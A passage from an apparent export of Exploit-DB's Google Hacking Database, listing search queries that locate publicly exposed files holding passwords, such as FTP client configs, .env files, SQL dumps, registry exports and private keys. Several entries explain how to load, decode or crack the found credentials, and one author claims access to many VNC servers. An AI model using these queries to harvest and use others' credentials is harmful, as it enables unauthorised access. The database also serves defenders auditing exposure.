<textualDescription>If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory).</textualDescription>
<query>filetype:dat inurl:Sites.dat</query>
<querystring>https://www.google.com/search?q=filetype:dat+inurl:Sites.dat</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>261</id>
<link>https://www.exploit-db.com/ghdb/261</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:dat wand.dat</shortDescription>
<textualDescription>The world-famous web-browser Opera has the ability to save the password for you, and it call the system &quot;Magic Wand&quot;. When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\Documents and Settings\Peefy\Programdata\Opera\Opera75\profile\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button.</textualDescription>
<query>filetype:dat wand.dat</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Adat+wand.dat</querystring>
<edb></edb>
<date>2004-05-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4812</id>
<link>https://www.exploit-db.com/ghdb/4812</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:doc inurl:&quot;gov&quot; intext:&quot;default password is&quot;</shortDescription>
<textualDescription>Pages from gov domain with default passwords assigned in their systems.
Also try &quot;pdf&quot; and &quot;txt&quot; in the file type.
Some of the default passwords being used are P4ssw0rd, #P@ssw0rd2013,
shadow, 39pL4q, WELCOME1, master.
Vaibhav Dhote
</textualDescription>
<query>filetype:doc inurl:&quot;gov&quot; intext:&quot;default password is&quot;</query>
<querystring>https://www.google.com/search?q=filetype:doc inurl:&quot;gov&quot; intext:&quot;default password is&quot;</querystring>
<edb></edb>
<date>2018-05-10</date>
<author>Vaibhav Dhote</author>
</entry>
<entry>
<id>6307</id>
<link>https://www.exploit-db.com/ghdb/6307</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:env &quot;DB_PASSWORD&quot;</shortDescription>
<textualDescription># Dork : filetype:env &quot;DB_PASSWORD&quot;
# This Dork reveals the .env files that contain Strings about Database Passwords, Hence revealing the passwords to the database found.
# Author : Shivanshu Sharma
</textualDescription>
<query>filetype:env &quot;DB_PASSWORD&quot;</query>
<querystring>https://www.google.com/search?q=filetype:env &quot;DB_PASSWORD&quot;</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Shivanshu Sharma</author>
</entry>
<entry>
<id>4845</id>
<link>https://www.exploit-db.com/ghdb/4845</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:env intext:REDIS_PASSWORD</shortDescription>
<textualDescription>.env files with password and username in plain-text of Redis, used in
Laravel and other web apps
Other:
filetype:env intext:APP_KEY=
Amal Jossy
</textualDescription>
<query>filetype:env intext:REDIS_PASSWORD</query>
<querystring>https://www.google.com/search?q=filetype:env intext:REDIS_PASSWORD</querystring>
<edb></edb>
<date>2018-06-06</date>
<author>Amal Jossy</author>
</entry>
<entry>
<id>253</id>
<link>https://www.exploit-db.com/ghdb/253</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:inc dbconn</shortDescription>
<textualDescription>This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!</textualDescription>
<query>filetype:inc dbconn</query>
<querystring>https://www.google.com/search?q=filetype%3Ainc+dbconn</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>207</id>
<link>https://www.exploit-db.com/ghdb/207</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:inc intext:mysql_connect</shortDescription>
<textualDescription>INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.</textualDescription>
<query>filetype:inc intext:mysql_connect</query>
<querystring>https://www.google.com/search?q=filetype%3Ainc+intext%3Amysql_connect</querystring>
<edb></edb>
<date>2004-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>857</id>
<link>https://www.exploit-db.com/ghdb/857</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:inc mysql_connect OR mysql_pconnect</shortDescription>
<textualDescription>INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database.</textualDescription>
<query>filetype:inc mysql_connect OR mysql_pconnect</query>
<querystring>https://www.google.com/search?q=filetype%3Ainc+mysql_connect+OR+mysql_pconnect</querystring>
<edb></edb>
<date>2005-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3833</id>
<link>https://www.exploit-db.com/ghdb/3833</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect</shortDescription>
<textualDescription>Aggregates previous mysql_(p)connect google dorks and adds a new filetype.
Searches common file extensions used as backups by PHP developers. These
extensions are normally not interpreted as code by their server, so their
database connection credentials can be viewed in plaintext.
- Andy G - twitter.com/vxhex</textualDescription>
<query>filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect</query>
<querystring>https://www.google.com/search?q=filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect</querystring>
<edb></edb>
<date>2013-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>900</id>
<link>https://www.exploit-db.com/ghdb/900</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:inf sysprep</shortDescription>
<textualDescription>sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs.</textualDescription>
<query>filetype:inf sysprep</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=filetype%3Ainf+sysprep+</querystring>
<edb></edb>
<date>2005-03-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>3712</id>
<link>https://www.exploit-db.com/ghdb/3712</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini &quot;FtpInBackground&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>Total commander wxc_ftp.ini run has through John etc. or even better use
http://wcxftp.org.ru/</textualDescription>
<query>filetype:ini &quot;FtpInBackground&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;FtpInBackground&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3709</id>
<link>https://www.exploit-db.com/ghdb/3709</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini &quot;pdo_mysql&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>full details dbname dbuser dbpass all plain text
Author:Bastich</textualDescription>
<query>filetype:ini &quot;pdo_mysql&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;pdo_mysql&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3711</id>
<link>https://www.exploit-db.com/ghdb/3711</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini &quot;precurio&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>plain text passwods </textualDescription>
<query>filetype:ini &quot;precurio&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;precurio&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3710</id>
<link>https://www.exploit-db.com/ghdb/3710</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini &quot;SavedPasswords&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>Unreal Tournament config, plain text passwords Author: Bastich</textualDescription>
<query>filetype:ini &quot;SavedPasswords&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;SavedPasswords&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3713</id>
<link>https://www.exploit-db.com/ghdb/3713</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini &quot;[FFFTP]&quot; (pass|passwd|password|pwd)</shortDescription>
<textualDescription>Asian FTP software -, run the password hash through John etc. Author: Bastich</textualDescription>
<query>filetype:ini &quot;[FFFTP]&quot; (pass|passwd|password|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:ini &quot;[FFFTP]&quot; (pass|passwd|password|pwd)</querystring>
<edb></edb>
<date>2011-04-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>648</id>
<link>https://www.exploit-db.com/ghdb/648</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini inurl:&quot;serv-u.ini&quot;</shortDescription>
<textualDescription>serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc.</textualDescription>
<query>filetype:ini inurl:&quot;serv-u.ini&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Aini+inurl%3A%22serv-u.ini%22</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>544</id>
<link>https://www.exploit-db.com/ghdb/544</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini inurl:flashFXP.ini</shortDescription>
<textualDescription>FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP.</textualDescription>
<query>filetype:ini inurl:flashFXP.ini</query>
<querystring>https://www.google.com/search?hl=de&amp;q=filetype%3Aini+inurl%3AflashFXP.ini&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>413</id>
<link>https://www.exploit-db.com/ghdb/413</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini ServUDaemon</shortDescription>
<textualDescription>The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more.</textualDescription>
<query>filetype:ini ServUDaemon</query>
<querystring>https://www.google.com/search?q=filetype%3Aini+ServUDaemon</querystring>
<edb></edb>
<date>2004-08-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>451</id>
<link>https://www.exploit-db.com/ghdb/451</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini wcx_ftp</shortDescription>
<textualDescription>This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.</textualDescription>
<query>filetype:ini wcx_ftp</query>
<querystring>https://www.google.com/search?q=filetype%3Aini+wcx_ftp</querystring>
<edb></edb>
<date>2004-08-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>256</id>
<link>https://www.exploit-db.com/ghdb/256</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ini ws_ftp pwd</shortDescription>
<textualDescription>The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the &quot;index of&quot; keyword or by searching directly for the PWD= value inside the configuration file.</textualDescription>
<query>filetype:ini ws_ftp pwd</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aini+%2Bws_ftp+%2Bpwd</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>266</id>
<link>https://www.exploit-db.com/ghdb/266</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:ldb admin</shortDescription>
<textualDescription>According to filext.com, the ldb file is &quot;A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.&quot; These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file.</textualDescription>
<query>filetype:ldb admin</query>
<querystring>https://www.google.com/search?q=filetype%3Aldb+admin&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>715</id>
<link>https://www.exploit-db.com/ghdb/715</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:log &quot;See `ipsec --copyright&quot;</shortDescription>
<textualDescription>BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC.</textualDescription>
<query>filetype:log &quot;See `ipsec --copyright&quot;</query>
<querystring>https://www.google.com/search?hl=en-BR&amp;q=filetype%3Alog+%22See+%60ipsec+--copyright%22&amp;btnG=Pesquisar</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>6568</id>
<link>https://www.exploit-db.com/ghdb/6568</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com</shortDescription>
<textualDescription>Category: Log Files Containing Latest Passwords
Yours Sincerely,
Anurodh Acharya
</textualDescription>
<query>filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com</query>
<querystring>https://www.google.com/search?q=filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com</querystring>
<edb></edb>
<date>2020-09-24</date>
<author>Anurodh Acharya</author>
</entry>
<entry>
<id>4102</id>
<link>https://www.exploit-db.com/ghdb/4102</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:log intext:password | pass | pw</shortDescription>
<textualDescription>http://www.google.com/search?q=filetype:log intext:password | pass | pw
Log files containing passwords...
Decoy</textualDescription>
<query>filetype:log intext:password | pass | pw</query>
<querystring>https://www.google.com/search?q=filetype:log intext:password | pass | pw</querystring>
<edb></edb>
<date>2015-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>231</id>
<link>https://www.exploit-db.com/ghdb/231</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:log inurl:&quot;password.log&quot;</shortDescription>
<textualDescription>These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.</textualDescription>
<query>filetype:log inurl:&quot;password.log&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Alog+inurl%3A%22password.log%22</querystring>
<edb></edb>
<date>2004-05-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>7194</id>
<link>https://www.exploit-db.com/ghdb/7194</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:log username admin</shortDescription>
<textualDescription># Google Dork: filetype:log username admin
# Files Containing Passwords
# Date: 09/009/2021
# Exploit Author: Rohit Singh</textualDescription>
<query>filetype:log username admin</query>
<querystring>https://www.google.com/search?q=filetype:log username admin</querystring>
<edb></edb>
<date>2021-09-13</date>
<author>Rohit Singh</author>
</entry>
<entry>
<id>286</id>
<link>https://www.exploit-db.com/ghdb/286</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:mdb inurl:users.mdb</shortDescription>
<textualDescription>Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such &quot;user&quot; databases. Some are password protected, many are not. Weee!</textualDescription>
<query>filetype:mdb inurl:users.mdb</query>
<querystring>https://www.google.com/search?q=filetype%3Amdb+inurl%3Ausers.mdb&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>507</id>
<link>https://www.exploit-db.com/ghdb/507</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:mdb wwforum</shortDescription>
<textualDescription>Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker.</textualDescription>
<query>filetype:mdb wwforum</query>
<querystring>https://www.google.com/search?q=filetype%3Amdb+wwforum</querystring>
<edb></edb>
<date>2004-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>259</id>
<link>https://www.exploit-db.com/ghdb/259</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:netrc password</shortDescription>
<textualDescription>The .netrc file is used for automatic login to servers. The passwords are stored in cleartext.</textualDescription>
<query>filetype:netrc password</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Anetrc+password</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>411</id>
<link>https://www.exploit-db.com/ghdb/411</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:pass pass intext:userid</shortDescription>
<textualDescription>Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline.</textualDescription>
<query>filetype:pass pass intext:userid</query>
<querystring>https://www.google.com/search?q=filetype%3Apass+pass+intext%3Auserid</querystring>
<edb></edb>
<date>2004-08-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3921</id>
<link>https://www.exploit-db.com/ghdb/3921</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:password jmxremote</shortDescription>
<textualDescription>Passwords for Java Management Extensions (JMX Remote)
Used by jconsole, Eclipse's MAT, Java Visual VM, JmxCli
http://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html
--
-[Voluntas Vincit Omnia]-
website http://www.erisresearch.org/
Google+ https://plus.google.com/u/0/114827336297709201563</textualDescription>
<query>filetype:password jmxremote</query>
<querystring>https://www.google.com/search?q=filetype:password jmxremote</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>4267</id>
<link>https://www.exploit-db.com/ghdb/4267</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:pcf &quot;cisco&quot; &quot;GroupPwd&quot;</shortDescription>
<textualDescription>Cisco VPN files with Group Passwords for remote access</textualDescription>
<query>filetype:pcf &quot;cisco&quot; &quot;GroupPwd&quot;</query>
<querystring>https://www.google.com/search?q=filetype:pcf &quot;cisco&quot; &quot;GroupPwd&quot;</querystring>
<edb></edb>
<date>2016-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>243</id>
<link>https://www.exploit-db.com/ghdb/243</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:pem intext:private</shortDescription>
<textualDescription>This search will find private key files... Private key files are supposed to be, well... private.</textualDescription>
<query>filetype:pem intext:private</query>
<querystring>https://www.google.com/search?q=filetype%3Apem+pem+intext%3Aprivate</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>3746</id>
<link>https://www.exploit-db.com/ghdb/3746</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)</shortDescription>
<textualDescription>Backup or temp versions of php files containing you guessed it passwords or
other ripe for the picking info...
Author: Bastich</textualDescription>
<query>filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)</querystring>
<edb></edb>
<date>2011-10-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>203</id>
<link>https://www.exploit-db.com/ghdb/203</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:properties inurl:db intext:password</shortDescription>
<textualDescription>The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating.</textualDescription>
<query>filetype:properties inurl:db intext:password</query>
<querystring>https://www.google.com/search?q=filetype%3Aproperties+inurl%3Adb+intext%3Apassword</querystring>
<edb></edb>
<date>2004-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>277</id>
<link>https://www.exploit-db.com/ghdb/277</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:pwd service</shortDescription>
<textualDescription>Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'.</textualDescription>
<query>filetype:pwd service</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Apwd+service</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>392</id>
<link>https://www.exploit-db.com/ghdb/392</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:pwl pwl</shortDescription>
<textualDescription>These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\Downloads\2004-07\07-26\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\Internet\PJIU_TAC'Password:'PJIUSCAC3000' ---</textualDescription>
<query>filetype:pwl pwl</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Apwl+pwl</querystring>
<edb></edb>
<date>2004-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>210</id>
<link>https://www.exploit-db.com/ghdb/210</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:reg reg +intext:&quot;defaultusername&quot; +intext:&quot;defaultpassword&quot;</shortDescription>
<textualDescription>These pages display windows registry keys which reveal passwords and/or usernames.</textualDescription>
<query>filetype:reg reg +intext:&quot;defaultusername&quot; +intext:&quot;defaultpassword&quot;</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+reg+%2Bintext%3A%22defaultusername%22+%2Bintext%3A%22defaultpassword%22</querystring>
<edb></edb>
<date>2004-05-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1257</id>
<link>https://www.exploit-db.com/ghdb/1257</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:reg reg +intext:â€ÃWINVNC3â€Ã</shortDescription>
<textualDescription>This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain &amp; abel. The query find registry entries which can otherwise be found can locally in:\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers.</textualDescription>
<query>filetype:reg reg +intext:â€ÃWINVNC3â€Ã</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+reg+%2Bintext%3A%E2%80%9DWINVNC3%E2%80%9D&amp;lr=lang_en</querystring>
<edb></edb>
<date>2006-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4972</id>
<link>https://www.exploit-db.com/ghdb/4972</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:reg reg HKEY_CURRENT_USER intext:password</shortDescription>
<textualDescription>Get passwords from registry.
You can also use
filetype:reg reg HKEY_CURRENT_USER
This would be a good way to find out details about the target software in
the target machine.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>filetype:reg reg HKEY_CURRENT_USER intext:password</query>
<querystring>https://www.google.com/search?q=filetype:reg reg HKEY_CURRENT_USER intext:password</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>215</id>
<link>https://www.exploit-db.com/ghdb/215</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</shortDescription>
<textualDescription>This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client.</textualDescription>
<query>filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS</query>
<querystring>https://www.google.com/search?q=filetype%3Areg+reg+HKEY_CURRENT_USER+SSHHOSTKEYS+</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>1268</id>
<link>https://www.exploit-db.com/ghdb/1268</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql &quot;insert into&quot; (pass|passwd|password)</shortDescription>
<textualDescription>Looks for SQL dumps containing cleartext or encrypted passwords.</textualDescription>
<query>filetype:sql &quot;insert into&quot; (pass|passwd|password)</query>
<querystring>https://www.google.com/search?q=filetype%3Asql+%22insert+into%22+%28pass%7Cpasswd%7Cpassword%29</querystring>
<edb></edb>
<date>2006-03-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3726</id>
<link>https://www.exploit-db.com/ghdb/3726</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql &quot;MySQL dump&quot; (pass|password|passwd|pwd)</shortDescription>
<textualDescription>MySQL database dump with passwords
Bastich</textualDescription>
<query>filetype:sql &quot;MySQL dump&quot; (pass|password|passwd|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:sql &quot;MySQL dump&quot; (pass|password|passwd|pwd)</querystring>
<edb></edb>
<date>2011-06-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3727</id>
<link>https://www.exploit-db.com/ghdb/3727</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql &quot;phpmyAdmin SQL Dump&quot; (pass|password|passwd|pwd)</shortDescription>
<textualDescription>phpMyAdmin SQL dump with passwords
Bastich</textualDescription>
<query>filetype:sql &quot;phpmyAdmin SQL Dump&quot; (pass|password|passwd|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:sql &quot;phpmyAdmin SQL Dump&quot; (pass|password|passwd|pwd)</querystring>
<edb></edb>
<date>2011-06-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3725</id>
<link>https://www.exploit-db.com/ghdb/3725</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql &quot;PostgreSQL database dump&quot; (pass|password|passwd|pwd)</shortDescription>
<textualDescription>PostgreSQL database dump with passwords
Bastich</textualDescription>
<query>filetype:sql &quot;PostgreSQL database dump&quot; (pass|password|passwd|pwd)</query>
<querystring>https://www.google.com/search?q=filetype:sql &quot;PostgreSQL database dump&quot; (pass|password|passwd|pwd)</querystring>
<edb></edb>
<date>2011-06-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>880</id>
<link>https://www.exploit-db.com/ghdb/880</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql (&quot;values * MD5&quot; | &quot;values * password&quot; | &quot;values * encrypt&quot;)</shortDescription>
<textualDescription>Locate insert statements making use of some builtin function to encrypt a password. PASSWORD(), ENCRYPT() and MD5() are searched.</textualDescription>
<query>filetype:sql (&quot;values * MD5&quot; | &quot;values * password&quot; | &quot;values * encrypt&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;q=filetype%3Asql+%28%22values+%2A+MD5+%2A%22+%7C+%22values+%2A+password+%2A%22+%7C+%22values+%2A+encrypt+%2A%22%29</querystring>
<edb></edb>
<date>2005-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>881</id>
<link>https://www.exploit-db.com/ghdb/881</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql (&amp;quot;passwd values&amp;quot; | &amp;quot;password values&amp;quot; | &amp;quot;pass values&amp;quot; )</shortDescription>
<textualDescription>Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses.</textualDescription>
<query>filetype:sql (&quot;passwd values&quot; | &quot;password values&quot; | &quot;pass values&quot; )</query>
<querystring>https://www.google.com/search?num=100&amp;q=+filetype%3Asql+%28%22passwd+values+%2A%2A%2A%2A%22+%7C+%22password+values+%2A%2A%2A%2A%22+%7C+%22pass+values+%2A%2A%2A%2A%22+%29</querystring>
<edb></edb>
<date>2005-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>274</id>
<link>https://www.exploit-db.com/ghdb/274</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql +&quot;IDENTIFIED BY&quot; -cvs</shortDescription>
<textualDescription>Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses.</textualDescription>
<query>filetype:sql +&quot;IDENTIFIED BY&quot; -cvs</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Asql+%2B%22IDENTIFIED+BY%22+-cvs</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3849</id>
<link>https://www.exploit-db.com/ghdb/3849</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql insite:pass &amp;&amp; user</shortDescription>
<textualDescription>Google Dork: filetype:sql insite:pass &amp;&amp; user
We Can get login username and password details from .sql file.
Author: BlacK_WooD</textualDescription>
<query>filetype:sql insite:pass &amp;&amp; user</query>
<querystring>https://www.google.com/search?q=filetype:sql insite:pass &amp;&amp; user</querystring>
<edb></edb>
<date>2013-04-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>3761</id>
<link>https://www.exploit-db.com/ghdb/3761</link>
<category>Files Containing Passwords</category>
<shortDescription>filetype:sql inurl:wp-content/backup-*</shortDescription>
<textualDescription>Search for WordPress MySQL database backup. Author: AngelParrot</textualDescription>
<query>filetype:sql inurl:wp-content/backup-*</query>
